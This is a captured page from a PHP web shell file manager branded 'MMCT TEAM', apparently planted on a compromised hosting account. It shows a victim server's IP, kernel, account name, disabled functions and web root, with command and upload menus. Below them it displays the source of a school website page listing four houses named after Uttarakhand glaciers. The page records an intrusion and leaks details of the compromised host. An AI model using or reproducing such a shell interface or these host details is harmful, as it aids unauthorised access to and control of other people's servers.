MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/name-of-house.php
<!DOCTYPE html>
<html lang="en" style="overflow-x: hidden;">
<head>
  <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Eklavya Model Residential School - Name Of House</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php include('include/header.php'); ?>

<div class="breadcrumbs">
    <div class="container">

    <!--    <h1 class="pull-left">
    Class Teacher</h1> -->

    <ul class="pull-left breadcrumb">
        <li><a href="javascript:void(0)">House System</a></li>
        <li><a href="javascript:void(0)">Name Of House</a></li>
    </ul>
    <!-- <div class="brs">
        <button type="button" class="print-gigw" onclick="printDiv('pr')" value="print a div!" ><i class="fa fa-print" aria-hidden="true"></i>
        </button>


        <script>
            function printDiv(pr) {
               var printContents = document.getElementById(pr).innerHTML;
               var originalContents = document.body.innerHTML;

               document.body.innerHTML = printContents;

               window.print();

               document.body.innerHTML = originalContents;
           }
       </script>
   </div> -->
</div>
</div>

</div>

<style>.menshow{display:block !important}
.house{
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
}
</style>

</div></div><section class="cls_teachers" id="pr">
    <div class="container-fluid row"><div class="col-xs-12" ><div class="ap-section ">
      <div class="headline" id="headlines"><h2 >Name Of House List</h2>
      </div>

      <div class="ap-plain" >    
        <div >
            <table class="table table-bordered">
                <thead>
                    <tr>
                        <th>SL No</th>
                        <th>House Name</th>
                    </tr>

                </thead>
                <tbody>
                    <?php
                    $q = "select * from house";
                    $query = mysqli_query($conn,$q);
                    $i=1;
                    while($res = mysqli_fetch_array($query)) {

                        ?>
                        <tr>

                            <td><?php echo $i++; ?></td>
                            <td><?php echo $res['house_name']; ?></td>
                        </tr>
                    <?php } ?>
                </tbody>
            </table>
        </div>
    </div>

    <div class="headline" id="headlines"><h2 > HOUSE NAMES <br>IN EKLAVYA MODEL RESIDENTIAL SCHOOL</h2></div>

    <ul style="list-style: inside;font-weight: bold;">
        <?php
        $q = "select * from house";
        $query = mysqli_query($conn,$q);
        while($res = mysqli_fetch_array($query)) {

            ?>
            <li><?php echo $res['house_name']; ?></li>
        <?php } ?>
    </ul>


    <div class="row">
        <div class="col-md-7" style="height: 345px;">
            <div class="house">
                <strong style="background-color:yellow;font-size: 20px;padding: 5px; ">DHAULI HOUSE</strong>
                <p>Dhauli a name derived from the glacier of uttarakhand. Dhauli represents the yellow colour in the school Eklavya model residential school. Yellow is for happiness, hope and spontaneity. The Dhauli ganga originate from Nitti valley . </p>
            </div>
        </div>
        <div class="col-md-5">
            <img src="images/DHAULI.jpeg" class="img-responsive">
        </div>
    </div>

    <div class="row mt-10 mb-10">
        <div class="col-md-7" style="height: 345px;">
            <div class="house">
                <strong style="background-color:red;font-size: 20px;padding: 5px;color:white; ">PINDARI HOUSE</strong>
                <p>Pindaric  a name derived from the glacier of uttarakhand . It  is a glacier found in the upper reaches of the Kumaon Himalayas, to the southeast of Nanda Devi and Nanda Kot. Pindari represents the red colour in Eklavya Model Residential School. Red symbolizes action, confidence, and courage.</p>
            </div>
        </div>
        <div class="col-md-5">
            <img src="images/PINDARI.jpeg" class="img-responsive">
        </div>
    </div>

    <div class="row mt-10 mb-10">
        <div class="col-md-7" style="height: 345px;">
            <div class="house">
                <strong style="background-color:blue;font-size: 20px;padding: 5px;color:white;">MILAM HOUSE</strong>
                <p>Milam a name derived from the glacier of Utttarakhand .  Milam Glacier is situated on the south facing slope of the of Trishuli and the southern slope of its eastern subsidiary Kohli.  Milam house represents blue colour in Eklavya Model Residential School. The color blue represents both the sky and the sea and is associated with open spaces, freedom, intuition, imagination, inspiration, and sensitivity.</p>
            </div>
        </div>
        <div class="col-md-5">
            <img src="images/MILAM.jpeg" class="img-responsive">
        </div>
    </div>

    <div class="row mt-10 mb-10">
        <div class="col-md-7" style="height: 345px;">
            <div class="house">
                <strong style="background-color:green;font-size: 20px;padding: 5px;color:white;">GAUMUKH HOUSE</strong>
                <p>Gaumukh a name derived from the glacier of uttarakhand. Gaumukh glacier is located in Uttarkashi district of Uttarakhand . It is 19 km away from Gangotri, which is primary source of Bhagirathi river. Gaumukh represents the green colour in Eklavya model residential school. The colour Green represents life, fertility, renewal and resurrection .</p>
            </div>
        </div>
        <div class="col-md-5">
            <img src="images/GAUMUKH.jpeg" class="img-responsive">
        </div>
    </div>






    

</div></div></div>
</section>
<br>


<?php include('include/footer.php'); ?>

MMCT - 2023